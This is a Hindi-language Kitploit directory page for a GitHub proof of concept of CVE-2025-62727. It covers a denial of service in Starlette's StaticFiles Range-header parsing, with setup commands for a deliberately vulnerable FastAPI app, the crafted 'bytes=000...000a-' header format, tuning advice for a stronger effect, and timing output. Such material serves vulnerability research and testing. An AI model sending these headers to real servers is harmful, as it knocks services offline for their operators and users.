Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/ch4n3-yoon/cve-2025-62727-demo
भेद्यता विश्लेषणशोषणवेब सुरक्षाAPI सुरक्षा
GitHubch4n3-yoon/cve-2025-62727-demo

CVE-2025-62727-Demo

CVE-2025-62727 का प्रूफ ऑफ कॉन्सेप्ट जो FastAPI (आधारित Starlette <= 0.48.0) में denial-of-service उत्पन्न कर सकता है

रिपॉजिटरी देखें
110 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-62727 डेमो

पीड़ित का विवरण

CVE-2025-62727 का लक्षित पीड़ित एक सरल FastAPI ऐप है जो:

  • / पर Hello World प्रदान करता है।
  • Starlette के StaticFiles का उपयोग करके /static के अंतर्गत स्थिर फ़ाइलें प्रदान करता है।
  • स्टार्टअप पर 1024, 2048, 50176 के लिए N बार दोहराया गया A युक्त टेक्स्ट फ़ाइलें स्वतः उत्पन्न करता है।

पीड़ित को कैसे चलाएं

  1. (वैकल्पिक) virtualenv बनाएं और सक्रिय करें।

  2. निर्भरताएँ स्थापित करें:

    root@kitploit:~
    pip install -r requirements.txt
    
  3. सर्वर प्रारंभ करें:

    root@kitploit:~
    uvicorn main:app --reload
    
  4. खोलें:

  • इंडेक्स पेज के लिए http://127.0.0.1:8000/।
  • स्थिर फ़ाइलों के लिए http://127.0.0.1:8000/static/1024.txt आदि।

नोट्स

  • स्थिर फ़ाइलें ऐप स्टार्टअप पर static/ निर्देशिका के अंतर्गत उत्पन्न होती हैं। मौजूदा फ़ाइलें अधिलेखित नहीं होती हैं।
  • स्थिर प्रदान करना अनुरोध के अनुसार Starlette के StaticFiles का उपयोग करता है।

PoC: CVE-2025-62727 (Range हेडर पार्सिंग)

शामिल poc.py /static रूट के माध्यम से bytes=000...000a- रूप के एक क्राफ्टेड हेडर का उपयोग करके Starlette के FileResponse में CPU-गहन Range पार्सिंग को ट्रिगर करता है।

सर्वर चलाएं, फिर दूसरे शेल में:

root@kitploit:~
python3 poc.py --sizes 1000,2000,4000,7000

लक्ष्य URL को ओवरराइड करें (वैकल्पिक):

root@kitploit:~
python3 poc.py --url http://127.0.0.1:8000/static/2048.txt --sizes 1000,2000

नोट्स:

  • PoC डिफ़ॉल्ट रूप से http://127.0.0.1:8000/static/50176.txt (ऐप द्वारा उत्पन्न एक फ़ाइल) को लक्षित करता है। इसे बदलने के लिए --url का उपयोग करें।
  • यदि आप 400/431 (हेडर बहुत बड़ा) देखते हैं तो --sizes को कम करें, या यदि हेडर सफल होते हैं और आप एक मजबूत प्रभाव चाहते हैं तो ऊपर की ओर समायोजित करें।

परिणाम उदाहरण:

root@kitploit:~
$ python3 poc.py --url http://127.0.0.1:8000/static/50176.txt --sizes '10000,20000,40000,80000'
[INFO] Target: http://127.0.0.1:8000/static/50176.txt
[MODE] regex (header = 'bytes=' + '0'*N + 'a-')
N= 10000 | header_len= 10008 | status=400 | elapsed=227 ms
N= 20000 | header_len= 20008 | status=400 | elapsed=883 ms
N= 40000 | header_len= 40008 | status=400 | elapsed=3530 ms
N= 80000 | header_len= 80008 | status=400 | elapsed=14525 ms
टूल डाउनलोड करें